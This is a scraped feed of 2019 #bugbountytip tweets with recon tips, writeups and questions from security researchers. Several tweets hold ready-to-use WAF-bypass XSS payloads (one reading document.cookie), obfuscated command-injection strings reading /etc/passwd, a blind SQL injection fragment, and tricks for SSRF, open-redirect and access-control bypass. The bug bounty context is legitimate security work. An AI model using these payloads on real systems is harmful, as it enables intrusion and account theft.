1 #bugbountytip if the password reset link is shortened in email try checking for common hashes/encodings you may end up with gold mine, in the below scenario the url was shortened and the url id was sequential and encoded in base64 -->Scraping all generated password resets links. https://t.co/n11msD9iPP
x30r
@x30r_


2019-09-07 21:55:13
1 Into cyber security?? I don't know who votes what so let's have a poll! What suits you the most! #cybersecurity #bugbountytip #bugbounty #infosecurity #infoeec
Hussein Daher
@HusseiN98D


2019-09-07 19:40:04
7 Analysis of an RCE I found past week. RT and Like if you want more! If you got a bug bounty program, I'm open to any invite :) #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/VX6QATnRJH
An0nym0us
@MeetAn0nym0us


2019-09-07 17:54:13
1 #bugbountytip While testing a Laravel site try injecting different kinds of payloads or change Request methods to GET>POST or POST>GET. this will result in Laravel exception handler error Disclosing AWS, Database, and SMTP Credentials. https://t.co/jTnU3rf28y
Zeinab Raadsato
@ZRaadsato


2019-09-07 17:21:09
0 All courses are available: Burp Suite, Ethical Hacking, Networking, Secure Coding Free for limited time. #bugbountytip #BugBounty https://t.co/fZCGs25uF0
Jenish
@_jensec


2019-09-07 09:34:14
0 Yay, I was awarded a $1,050 bounty on @Hacker0x01 for bypassing 2FA via old API version’s login page! https://t.co/YGr8yp0IKy #TogetherWeHitHarder #bugbountytip
Osama Avvan
@osamaavvan


2019-09-07 08:22:00
2 My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/Ewt9p3qPSe
Muzammil Kayani 🇵🇰
@muzammilabbas2


2019-09-06 15:26:35
0 #bugbountytip: Access the site without logging into an account; you will get some hidden endpoints which are overlooked by others.
Tinu rockk
@TinuRock007


2019-09-06 11:14:47
0 https://t.co/kCnDw5TEZu Open redirect to xss (2019) @BugBountyPOC #bugbountytips #BugBountyPOC #BugBounty #security #bugbountytip #bugbountytips #xss https://t.co/KTAOhiR0I7
C1h2e1
@C1h2e11


2019-09-06 10:05:40
1 #bugbounty #Bugbountytip Yesterday's problem was solved, forgetting to modify the Content-length but result is duplicated . So sad
Shamem Ahmad
@blkryd


2019-09-06 09:13:48
0 Finding webshells in a linux server. find . -name "*.php" | xargs grep -E 'webshell|' #Bugbountytip #hacktolearn
Shamem Ahmad
@blkryd


2019-09-06 08:50:54
1 A plus sign (+) A simple URL encoded space (%20) A null byte (%00) A newline (%0a) A tab (%09) A carriage return (%0d) #Bugbountytip
OSRC
@OsrcSecurity


2019-09-06 07:59:10
0 We are updating the official website now, but always welcome all the hackers chasing the bug bounty of OSRC, any issue or question about the programs, just leave your messages or to our emailbox [email protected] #Hackers #Bugbountytip
Leonel Emiliano
@leoalgare


2019-09-06 05:02:35
0 Hey guys, is there any way to perform a bypass of CSRF if I need to set a specific XSRF-TOKEN in order to exploit the issue? I wasn't able to use XHR because of CORS policy. Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: * #bugbountytips #bugbountytip
Shubham Sharma
@Shubham_pen


2019-09-06 03:13:23
7 Today you will learn WordPress penetration testing using WPScan and Metasploit. @rajchandel @metasploit @ubuntu @kalilinux @wordpressdotcom @github #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningFriday #CyberAttack #oscp #blackhat https://t.co/KT2wD17IVG
ak1t4 🇦🇷
@akita_zen


2019-09-06 02:02:10
9 #Bugbountytip: forget the subdomains for recon! go directly for the ASN & hit the network-range organization: A new world arises without waf’s, a lot of messy SSL certs, unprotected hosts & private hidden scopes! #bugbounty #infosec #thinkOutsideTheBox
C1h2e1
@C1h2e11


2019-09-05 17:05:24
1 #bugbounty #BugBountyTip I found an HTTP Request Smuggling and looked for the endpoint that echoed the request. In this endpoint, I tried to enter the long data successfully, but I ended up testing only a few characters of the request I don't know why this is😂
Ammar Amer🇸🇾
@cry__pto


2019-09-05 14:17:38
1 -“An XSS on Facebook via PNGs & Wonky Content Types”: https://t.co/K7uiWoQtZ8 -shopifyapps XSS on sales channels via currency formatting: https://t.co/wu6SZ1DcxE -UNITED AIRLINES XSS: https://t.co/kRbaMJTXlN -GOOGLE TAG MANAGER STORED XSS: https://t.co/PBAj81OEE1 #BugBountyTip
Proxy
@LinuxKodachi


2019-09-05 13:49:35
0 Here is a website that archive bug bounty tips. 👉https://t.co/hG46WtG0dd Check it out, it has other useful resources too. 😀 #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
emir c a
@emirca_


2019-09-05 10:13:07
0 Got the 500 error with single quote but can’t find the SQLi parameter for it... But 500 error can lead to SQLi right? #BugBounty #bugbountytip
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-09-05 05:59:42
0 CloudFlare {WAF} "R-XSS" Bypass; 🛡 ~ <isindex action="javas&tab;cript:alert(1)" type=image> ~ #BugBounty #BugBountyTip #WAF #infosec
David Schütz
@xdavidhu


2019-09-04 17:08:11
2 #bugbountytip - If your target requires phone number verification and you need more accounts, you can just buy a really cheap prepaid SIM card, and without topping it up, you can receive the verification codes in SMS! ⚡ (even better if you have a dual-sim phone) https://t.co/oUDJKIik3X
Mourad
@SecuAudit


2019-09-04 16:25:54
0 How do you deal with your hosting server provider for large Port Scanning complaints ? #bugbounty #bugbountytip #pentesting #hackerone https://t.co/pn9Zzmxuaa
sudoka
@sudo_sudoka


2019-09-04 16:10:23
0 Does anyone have experience with @InternetNZ bugbounty program? #bugbounty #bugbountytip
intigriti
@intigriti


2019-09-04 12:27:00
6 Did you know you can extract the AWS S3 bucket name from an object URL by appending these parameters? 🕵️Thanks for the #BugBountyTip, @neeraj_sonaniya! #HackWithIntigriti https://t.co/cfVpRpOw1s
Hackers Academy
@Hackers_Academy


2019-09-04 10:40:17
0 98 Days Left! Introducing the 2nd training... @banyrock will take you on a 4 days journey of fully practical web hacking & bug hunting training. Be ready to learn some advanced techniques! #bugbountytip #Pentesting #infosec https://t.co/ixzLERf8Io https://t.co/9B4tg5DSvF
Rémy Marot
@R_Marot


2019-09-03 21:13:30
0 Quick #bugbountytip : if you are testing a symfony application, do not forget to check both app_dev.php and app_test.php controllers for debug information and sometimes sensitive information disclosure
Julien Ahrens
@MrTuxracer


2019-09-03 18:36:57
0 Plaintext password disclosure leading to admin access on a development environment. That just made my day. Remember: Always dig into JS files. They're a gold mine of stuff! #BugBounty #BugBountyTip
Dhamu
@Dhamuharker


2019-09-03 15:02:54
1 #bugbountytips The AWS Cloud Post Exploitation framework! POC https://t.co/nmhvNDdIRU #BugBounty #bugbountytip #ItTakesACrowd #togetherwehitharder
abdoul gadiri balde
@moodiAbdoul


2019-09-03 12:17:38
2 #bugbountytip you can also use https://t.co/SI3CMaQq42 during recon , just search your target website or app to know how it work in short of time #infosec #bugbounty
Un4gi
@Un4gi1


2019-09-03 08:50:20
0 #bugbountytip If you don’t have enough room for typical XSS, try <base href=//url.co>. This will make every link on the same page redirect to the URL referenced! 😃
Bob Nicolson
@NicolsonBray


2019-09-03 08:01:00
0 Google throws bug bounty bucks at mega-popular third-party apps https://t.co/ZSu5DHaLjf #BugBounty #bugbountytip #google #Apps #cybersec #infosec #Hackers https://t.co/UzhkCYOmww
Meelo
@CaptMeelo


2019-09-02 12:21:41
1 Just published another post that might be useful during #bugbounty or #recon sessions. #bugbountytip https://t.co/NTTaI2KqHE
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-09-02 06:43:33
6 ModSecurity { XSS } Detection Bypass; 🔐 { 1 }; <img src=x:alert(alt) onerror=eval(src) alt='spyerror'> { 2 }; "></tag><svg onload=alert(spyerror)> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-09-01 21:30:41
0 There is no csrf token when changing email. I'm creating csrf poc, and when I try to open poc.html with my other account, I get a "session expired" warning. What is the problem? How can I bypass it? #hackerone #bugcrowd #infosec #BugBounty #bugbountytip #csrf #intigriti
%00Termi
@Elhan65805947


2019-09-01 12:36:25
0 https://t.co/xNc07m02x7 >> companyname.tld Paste >> https://t.co/NLo3oX2Loz Sometimes you may find upcoming project details, link to invite private meetings, other stuff. Keep on checking regularly. #bugbounty #bugbountytip
Ammar Amer
@cry__pto


2019-09-01 12:30:19
1 It is not difficult to bypass #XSS filters. Remember that a firewall is a stupid device, just edit a simple part of the payload. You can use encoding, tag modifiers, and a lot of other ways like adding some unfamiliar characters or symbols to the payload. #bugbountytip
ak1t4 🇦🇷
@akita_zen


2019-09-01 01:43:09
7 #Bugbountytip: take your time to learn bash, curl & python 🐍 basics scripting. With only a few lines of those you can break anything! Automate your scripts & get the best PoCs #bugbounty #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-31 17:22:20
0 How can I redirect xhr login page? If I capture request with burp, web page redirecting other web page. But I can't do it with url? Any idea? #hackerone #bugcrowd #bugbountytip #infosec #redirect #vulnerability
Security Chops
@securitychops


2019-08-31 15:05:31
0 /dev/random - One Liner For Installing Burp Certificate Into Android Nougat and Later #burp #android #BugBounty #bugbountytip https://t.co/BtVxMMy6Jb
sudoka
@sudo_sudoka


2019-08-31 12:17:54
1 CSP can support you to make a #clickjacking possible even when X-Frame-Options: DENY. #bugbounty #bugbountytip https://t.co/AQf5mQk84W
Proxy
@LinuxKodachi


2019-08-31 06:57:10
0 Here is a google dork to find discord servers. 👉 https://t.co/bmVpQAaOgy "keyword" #bugbountytip #OpenSource #osint #Discord
Elhan
@Elhan65805947


2019-08-30 20:09:48
0 A single little dork can give admin access. Site:https://t.co/AUzqSGF92I companyname.tld Bookmark else keep interesting tabs hanging. >> win! #BugBounty #bugbountytip
Mourad
@SecuAudit


2019-08-30 17:30:33
0 I just lost 3000$USD in 2 days trading Forex , definitively Bug Bounty is more profitable and less risky than trading😰 #BugBounty #bugbountytip
Jenish Sojitra
@_jensec


2019-08-30 16:58:57
0 Yay, I was awarded a $1,200 bounty on @Hacker0x01 for tricky privilege escalation ! “ If API endpoint /api/path/ep throwing 401 try to go with /api/path/ep.json “ and it will fetch out json data without checking access control ! #bugbountytip
sagar yadav
@sagaryadav8742


2019-08-30 16:32:42
0 Hotstar swag 😊 Happy to #secure #hotstar #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #bounty #sagaryadav8742 https://t.co/iAgSxeRFre
Cyberthereaper
@Cyberthereaper3


2019-08-30 16:31:00
0 Is have dork for out of band all injection method? #hackerone #bugcrowd #infosec #bugbountytip
intigriti
@intigriti


2019-08-30 14:19:13
2 Thanks for the #BugBountyTip, @securinti! #HackWithIntigriti (P.S.: You are now banned from our live webinars) 👀🚫 https://t.co/z8Cz3rAUgS
sagar yadav
@sagaryadav8742


2019-08-30 13:37:17
0 #redstorm swag #reward and #hof Happy to #secure #redstorm 😊 #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter https://t.co/azpBgqAn21
3P1C
@_3P1C


2019-08-30 13:27:03
0 Bypass for SSRF filter: find a subdomain of your target (whitelisted) that resolves to an internal IP, like this: internal[.]target[.]com --> 127.0.0.1 #bugbountytips #bugbountytip @intigriti @Bugcrowd @Hacker0x01
Fisher
@Regala_


2019-08-30 09:42:22
2 Yes!! Burp Scope Monitor just reached its 100th⭐️!! 🥳🥳 If you haven't used it yet, have a look at https://t.co/2zzgrNvj3G. Currently I'm especially looking for bugs/improvements suggestions so I can work on them later. #bugbounty #bugbountytip #infosec #pentest
Fady Othman
@Fady_Othman


2019-08-30 05:37:29
1 Do you think recording video tutorials using a 21:9 format (Wide Screen) is a good idea? #bugbounty #bugbountytips #bugbountytip
The_unstable
@chaskar_shubham


2019-08-29 13:03:23
0 I rewrote Recce from scratch! It is now faster than the previous version. It can now detect the server. You can write output to a CSV file. https://t.co/CGFQHNaA64 check out! #bugbountytips #bugbountytip #bugbounty #InformationSecurity #infosec #infosecurity #hackerone #bugcrowd
Jagannath
@SecurityBoy0x01


2019-08-29 09:56:59
0 [Protip] Passwords using leetspeak are much safer than normal passwords against bruteforce attacks with wordlists. E.g. '53CURI7Y' is much more secure than 'Security', when combined with password managers. #bugbountytip #Password #hacking
Cyberthereaper
@Cyberthereaper3


2019-08-28 22:59:14
0 The biggest obstacles that will prevent you in bug bounty programs: Ruby web page, JSON content-type, AkamaiGHost, CloudFront, Cloudflare #BugBounty #hackerone #bugcrowd #intigriti #infosec #bugbountytip
Julien Ahrens
@MrTuxracer


2019-08-28 18:23:55
1 I recently got a maximum bounty for: Reflected XSS -> Grabbed user's identity token (no auth) -> Found auth logic error that converted the token w/o the user's pwd into an auth token -> ATO & 2FA Bypass. Always maximize your impact! #togetherwehitharder #bugbountytip #BugBounty
Yadhavi
@PrincessYadhavi


2019-08-28 16:42:39
0 How much rate you will use to get best results from masscan? (1024 hosts, 5$ digitalocean vps) #bugbounty #bugbountyhelp #bugbountytip #bugbountytips #masscan
Random Robbie
@Random_Robbie


2019-08-28 10:32:27
3 #bugbountytip BUGROBBIE for discount on @binaryedgeio
Cache Bounty @127.0.0.1
@Cache_Bounty


2019-08-28 09:06:40
1 Old but very useful: https://t.co/j1GHbfHNsc #security #bugbountytip #bugbountytips
Michael Eder
@michael_eder_


2019-08-28 08:33:10
1 Authenticated dirbusting 1) Log in w/ Firefox>DevTools>Network>reload page 2) Right click request, "copy curl" 3) rustbuster <your regular rustbuster options> <all -H parameters of the curl command> 4) Profit #infosec #bugbountytip #pentest
kaustubh padwad
@s3curityb3ast


2019-08-28 08:13:39
1 Ever Happen'd this @Hacker0x01 with known guys.. @sagarparmar121 @niksthehacker @stokfredrik @fransrosen @emgeekboy @Parth_Malhotra #bugbountytip #bugbounty @gwendallecoguic #hackerone #bugcrowd @SynackRedTeam is exception for this sharp 24Hrs payout.. ;) Just for Fun #bontyfun https://t.co/wyuV36SLWt
Nihad
@nihad_rekany


2019-08-28 08:09:48
0 Feeling love 🥰🥰 @fbsecurity #bugbountytip #bug https://t.co/Pc9V8CSJuu
Nihad
@nihad_rekany


2019-08-28 08:08:24
0 Thank you @fbsecurity 🥰🥰🥰 #bugbountytip https://t.co/jnggbyDNx8
Neeraj Edwards
@neeraj_sonaniya


2019-08-28 05:29:04
2 Revealing AWS S3 bucket name: step 1: Find any CDN object URL step 2: append the following string after the URL: `?AWSAccessKeyId=[Valid_ACCESS_KEY_ID]&Expires=1766972005&Signature=ccc ` and boom it will reveal the bucket name. #BugBounty #security #bugbountytip #bugbountytips https://t.co/JWqGuZLHW4
Ahmed Lekssays
@Lekssays


2019-08-27 22:51:16
0 I made a tool to Extract Open Kibana Instances on Internet and Map them to their Corresponding Organizations using SSL certificates for Bug Bounty Programs. You can check it out: https://t.co/IQQIKdaAaC Happy hunting ;) #bugbounty #bugbountytip
Radek
@radekk


2019-08-27 19:45:52
1 Read how to use Burp Suite with multiple Firefox profiles - https://t.co/xqRPeT8NfC #bugbountytip #bugbounty
Aussan 🇨🇦
@aussan_m


2019-08-27 18:15:36
1 #bugbounty #bugbountytip When you get a bounty try to remember that there are people in need out there...try to give to charities, ... helping companies become secure is great, but helping others is even better.... remember what goes around comes around....
kaustubh padwad
@s3curityb3ast


2019-08-27 16:31:02
0 If you could ever build such complex query and if it returned 404 in "boolean based blind sql injection" AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x21) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x70686f746f73. what will be your reaction... #bugbountytip #ctf
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-27 00:31:48
3 CloudFlare {"HTML TO XSS"}; ~byPass Detected. 📡 [" <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> "] #BugBounty #BugBountyTip #WAF #infosec
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-26 23:48:19
0 CloudFlare {"XSS"}; ~byPass Detected. 📡 <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-26 21:52:05
0 I think one of the pages you hate to open the xss alert box is that it uses the ruby software language. #bugbounty #bugbountytip #hackerone #bugcrowd #infosec #redteam #xss #hacking
Murdockz
@Murdockz_CEH


2019-08-26 17:36:42
0 Created my first "Real" python script that decodes any base64 string...I think lol. Don't judge me it's my first time learning python lol. Check it out. #bugbountytip #bugbountytips #bugbounty https://t.co/rSnsf6BoBb
kaustubh padwad
@s3curityb3ast


2019-08-26 17:19:32
0 This is how I learn SQL Injection nowadays... #rofl #ctf #SQL #injection #bugbountytip #wireshark #hackerone #AppSec but I can imagine how tough this is to exploit, since sqlmap is taking too much time, now it's 2+ hours with --dump-all... :) https://t.co/t1G0qtaNQh
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-08-26 16:50:20
0 Regexp trying to detect open redirect in response, for Burp #bugbountytips #bugbountytip https://t.co/LTbegfJf77
Murdockz
@Murdockz_CEH


2019-08-26 09:48:23
1 My first Bugcrowd P1. API Keys, Firebase Tokens, Account username and password. Recon wins. #BugBounty #bugbountytip #bugbountytip https://t.co/K6C0mnajQH
Hussein Daher
@HusseiN98D


2019-08-25 14:31:51
10 As per the vote results, here you go! A cool XXE resulting from a SSRF found on local company website during a pentest. DMs are open, retweet and like if you love this style of PoC! 😎 #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/XbwBLdYO33
gautam bhatia
@gautambhatia57


2019-08-25 11:14:23
0 Thanks a lot @defcon @DCG91135 @Bugcrowd @lab401 @infosecgirls @hackthebox_eu @PortSwigger for amazing workshop at DIT University #infosec #security #reversing #bugbountytip #rfid https://t.co/wqtmwLM4y9
Arif Khan
@payloadartist


2019-08-24 14:17:36
2 Another awesome research by a god of websec @filedescriptor: The Cookie monster in your browsers https://t.co/x051kiyWgJ #BugBounty #BugBountyTip
Hussein Daher
@HusseiN98D


2019-08-24 13:52:55
1 My next #bugbountytip PoC (check my Twitter for a preview of the old ones) should talk about: #bugbounty
Yogendra Jaiswal
@vulnh0lic


2019-08-24 13:28:31
17 Just Published article of [iOS Application Security] Jailbreak 12.4 and SSL pinning bypass | How to set up your iOS Testing Lab https://t.co/kVAs20V8dC #infosec #bugbountytip #sslbypass #jailbreak #iOS124 #unc0ver Thanks, @prateek_0490 and @Yassineaboukir @jpjaypatel34
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-24 11:25:33
1 Time US : 10:00 Time ID : 21:00 Bug Bounty Live! basic #recon , VulnerabilityAnalysis #shodan Live at : https://t.co/QdsrDoweOQ Follow Live streams and share... #BugBounty #bugbountytips #bugbountytip #hackerone #bugcrowd
Raihan Biswas 🇨🇮
@zapstiko


2019-08-24 05:01:29
3 Sucuri {` XSS ´}; payloads `appeared fresh, confirmed.´ ↭ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Vitthal Shinde
@0_1VitthalS


2019-08-24 04:11:48
1 If you found a hardcoded slack token, you can use it to get invitation to slack group. https://t.co/OMxs8QFVjQ<slack_token>&channel=CL0KQ4SK1&user=<email>&pretty=1 #BugBountyTip
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-23 06:41:14
1 Sucuri {` XSS ´}; payloads `appeared fresh, confirmed.´ ↭ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Uranium238
@uraniumhacker


2019-08-22 18:02:56
1 Have your tools exporting stuff as JSON? use Panda to export it as a .db file. You can then use client side js to parse the db and query through it. #bugbountytip
contra_security
@security_contra


2019-08-22 17:46:16
0 Analysis of Ruby rest-client 1.6.13 backdoor https://t.co/KGSXYpw68B @snyksec #owasp #backdoor #ruby #appsec #bugbountytip
m0z
@LooseSecurity


2019-08-22 16:47:55
6 file.php?url=/admin/ Redirects to: https://t.co/xsJrSUcfgM Put URL [email protected] Now it is [email protected] which redirects to https://t.co/ptXaIXLfKk! #BugBounty #bugbountytip #bugbountytips #infosec #CyberSecurity
Prateek Tiwari
@prateek_0490


2019-08-22 15:47:03
4 Really shocking to see how companies leave their log instances exposed to public. I'm referring to #Kibana, since last few weeks have found a lot of them, reported to companies who have BBP's. Dork - inurl:app/kibana Shodan - title:"kibana" port:"443" #bugbountytip #bugbounty
sudoka
@sudo_sudoka


2019-08-22 10:57:15
0 I've seen some websites block exactly the string "alert(something)" #xss #bypass #bugbountytip https://t.co/MKOSMHdKcA
Dhamu
@Dhamuharker


2019-08-22 09:11:57
2 #bugbountytips #BugBounty Finally Got it Root Access. Thanks for @orange_8361 @ProjectZeroIN the exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510) https://t.co/k1Qk45QnCq #bugbountytip #ItTakesACrowd #TogetherWeHitHarder https://t.co/lwJi2ss068
Anton Korzhynskyi
@page_1337


2019-08-21 21:42:14
0 My turn :) Cloudflare #XSS #Bypass <img src onerror=%26emsp;prompt`${document.domain}`> #WAF #BugBounty #BugBountyTip https://t.co/UxkKOfkioC
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-21 19:54:51
1 ModSecurity {" XSS "} ~Bypass braindeath; ⓾ ~1; " %3Cspyerror%20script%20goes%20here%3E=%0AByPass " ~2; "%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E" #BugBounty #BugBountyTip #WAF #infosec
CaptainFreak
@0xCaptainFreak


2019-08-21 12:09:46
0 On Rails targets, many people don't try XSS tests, knowing that Rails by default doesn't reflect without escape/encode. But "security conscious" devs mistake the "html_safe" method of Rails for escaping while it does the exact reverse thing. Hence, XSS lives on. #bugbountytip
Abugzlife
@abugzlife1


2019-08-21 01:39:35
5 Have you ever thought to yourself: “You know what, I’m really curious what the methodology for finding bugs that an average bug hunter who focuses on depth rather than breadth looks like!” Well, now is your chance to see! https://t.co/ih8hwmaIP6 #bugbountytip #bugbounty
plenum 🇹🇳
@plenumlab


2019-08-20 23:21:47
1 To those who struggle to get into bb I barely knew what http requests look like, 14 duplicates and 4 N/A before my first valid report, don't quit, every minute, every inspected http request is experience #bugbountytips #bugbountytip
Ammar Amer
@cry__pto


2019-08-20 23:15:45
1 I think you should visit my repository, you may find something useful about hacking & pentesting & cybersecurity & redteam & malware. Almost 2000 links & almost 1000 articles as PDF files. Enjoy and #happy_hacking https://t.co/q2layzVpKz #sharingiscaring #bugbountytip #OSINT https://t.co/DWQFvHpWuN
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-20 19:03:48
0 yay I found Jira Dashboard at @Hacker0x01 #DOD Exploiting Jira Dashboard Leads to (RCE) This report waiting a Disclosed / Fixed and waiting for #writeups #BugBounty #bugbountytip #rce #jira_rce https://t.co/T0M5Zr8q2B
Rishabh
@____cypher____


2019-08-20 18:35:23
0 Did you know you can "edit and resend" requests without any interceptor in Mozilla firefox #bugbountytip #BugBounty https://t.co/FrtUB2KUO8
Raihan Biswas 🇨🇮
@zapstiko


2019-08-20 15:08:22
4 {XSS}; CloudFront Bypass, dot shot. ✴️ ~/1~ <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';> ~/2~ <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// #BugBounty #BugBountyTip #WAF #infosec
Faizal Abroni
@faizalabroni


2019-08-20 13:58:44
0 AWS Metadata Disclosure via hardcoded host download (Indonesian language) https://t.co/lkxDPZ8VN8 #bugbounty #bugbountytip #bugbountytips #togetherwehit #ittakesacrowd
C1h2e1
@C1h2e11


2019-08-20 13:34:45
2 A tip from Nahamsec @NahamSec curl -X GET https://t.co/pIuaaFEPZL{organization} https://t.co/5XaiHYznhj{organization} https://t.co/7AlvIjzWht{IP address} Shodan search query ASN:{ASN} #bugbountytip #bugbountytips https://t.co/RGdbP6rj4u
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-20 13:08:57
3 {XSS}; CloudFront Bypass, dot shot. ✴️ ~/1~ <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';> ~/2~ <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// #BugBounty #BugBountyTip #WAF #infosec
Securisec 🚀
@securisec


2019-08-20 11:34:28
0 "RT RT Regala_: Here it is! Burp Scope Monitor, a simple Burp_Suite extension to help you keep track of unique endpoints in your history, marking them as analyzed, highlighting and other cool stuff! Check it out: https://t.co/EFXtxmOLEE #bugbounty #bugbountytip 🥳🥳😇"
Cyberthereaper
@Cyberthereaper3


2019-08-20 10:54:47
0 sometimes we cannot find vulnerabilities due to a web browser problem. #hackerone #bugcrowd #infosec #bugbounty #bugbountytip #blackhat #defcon #redteam #LFI #RFI #hacking #chrome #firefox #recon #osint example : https://t.co/D0RK0uDcB2
Sergey Kashatov
@iframe0x01


2019-08-20 10:25:10
1 #hackerone #bugbounty #bugbountytip I just published How I upgraded my privileges to the administrator of Odnoklassniki’s url shortener https://t.co/yBKYctUp0a
Fisher
@Regala_


2019-08-20 09:20:01
14 Here it is! Burp Scope Monitor, a simple @Burp_Suite extension to help you keep track of unique endpoints in your history, marking them as analyzed, highlighting and other cool stuff! Check it out: https://t.co/2zzgrNvj3G #bugbounty #bugbountytip 🥳🥳😇
luffydragneel
@Hackers_Guild


2019-08-20 06:53:26
0 If there is a subscription for a pro account for suppose 1 year, always Intercept the Request and change the subscription period. In some cases, you will be able to increase the subscription to any no. of years leading to Business logic vuln. #bugbountytip @SynackRedTeam https://t.co/NLDXDbquzY
Osama Avvan
@osamaavvan


2019-08-19 18:07:09
1 My Writeup about Different Ways of Exploiting CSRF. https://t.co/yneogH4EYL #bugbountytip @bugbountypocs
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-19 16:40:35
0 { WAF }; bypass post based xss ✨ ~Payload; <message><dialogueType>&e;</dialogueType></message> ~Result; WAF Allowed: 200 #BugBounty #BugBountyTip #WAF #infosec https://t.co/f28Yby7WZR
Soroush Dalili
@irsdl


2019-08-19 11:33:43
0 #BugBountyTip: To make your Burp Suite testing faster, change its colour to Red! With go faster stripes as suggested by @bao7uo
Proxy
@LinuxKodachi


2019-08-19 11:27:51
0 🛡 Honest advice, Sherlock! 🛡 #bugbountytip #mentor #entrepreneur #Developer #programming #programmers #startup https://t.co/0I8cofTS3X
ak1t4 🇦🇷
@akita_zen


2019-08-19 06:38:08
2 #Bugbountytip: avoid defining yourself by what you know or what you have or what you get ($$$). You are truly unique and your being can’t be defined by a temporal status. Enjoy bugbounty, play a little, bb needs to be fun :) #bugbounty #infosec #mentalhealth
Cyberthereaper
@Cyberthereaper3


2019-08-19 06:33:41
4 S3 bucket finder cat subdomain.txt | httprobe | tee hosts && meg -d 1000 -v / && grep -horiE [A-z0-9.-]+\.s3\.amazonaws\.com (You can change regex or you can add more regex with && ) @TomNomNom #hackerone #bugcrowd #recon #infosec #blackhat #bugbounty #bugbountytip #osint #s3
mr_nyx
@mr_nyxs


2019-08-18 19:11:24
1 Never give up! Payload URLENCODE(payload) URLENCODE(URLENCODE(payload)) URLENCODE(URLENCODE(URLENCODE(payload))) ... #BugBountyTip #BugBounty
HackIsOn ®
@hackison


2019-08-18 17:33:00
0 What will be your answer to the following question #infosec people? 🤔 How to #hack android phones using Link ? 😂 #hacking #pentesting #linux #bugbounty #bugbountytip #exploit #kalilinux #offsec #redteam #pentester #hackison #wapt #vapt
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-18 17:12:44
2 Hi babe again I'm, whats up fbi. I warned very , lest he remove the search button from there. 💣 Patch: https://t.co/NhIAxHWUUl #BugBounty #BugBountyTip #WAF #infosec https://t.co/azwQwX5nMh
YS
@YShahinzadeh


2019-08-18 16:45:08
0 JSONP call returning auth token -> acc takeover #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2019-08-18 15:42:00
0 Don't expect different assets/endpoints if you are searching in the same subdomain. #bugbountytip #BugBounty #WebPentest #SearchSomethingElse
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-18 14:21:24
5 "Cloudflare"; live payloads: 🧠 ~1: <img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'> ~2: <img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//"" src="x" alt="showme"> #BugBounty #BugBountyTip #WAF
NetDevilz
@netdevilz


2019-08-18 13:03:14
0 Time may have forgotten everything, never date ... #netdevilz ICANN: https://t.co/FZafbc6qaj #bugbounty #webapp #bugbountytip #infosec #waf https://t.co/sYW3KKhdSo
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-18 08:43:13
1 Sucuri { RCE }; payloads, dot shot. 🌪️ Smuggling RCE Payloads: </> /???/??t+/???/??ss?? </> Obfuscating RCE Payloads: </> ;+cat+/e'tc/pass'wd </> </> c\\a\\t+/et\\c/pas\\swd </> #BugBounty #BugBountyTip #WAF #infosec
Str0k1rch
@str0k1rch


2019-08-18 08:32:02
1 Do you guys stop trying for XSS When Cloudflare is used? If not, got any tips? :) #bugbountytip #bugbounty #infosec
Murdockz
@Murdockz_CEH


2019-08-18 02:47:26
1 Guys if you're looking for a way to host a Kali Linux instance in the cloud check out this tutorial on creating your own Kali Linux cloud VM with DigitalOcean https://t.co/xnP1cfd8lZ. I highly recommend. https://t.co/0TpWOKInke #bugbountytips #bugbountytip #bugbounty
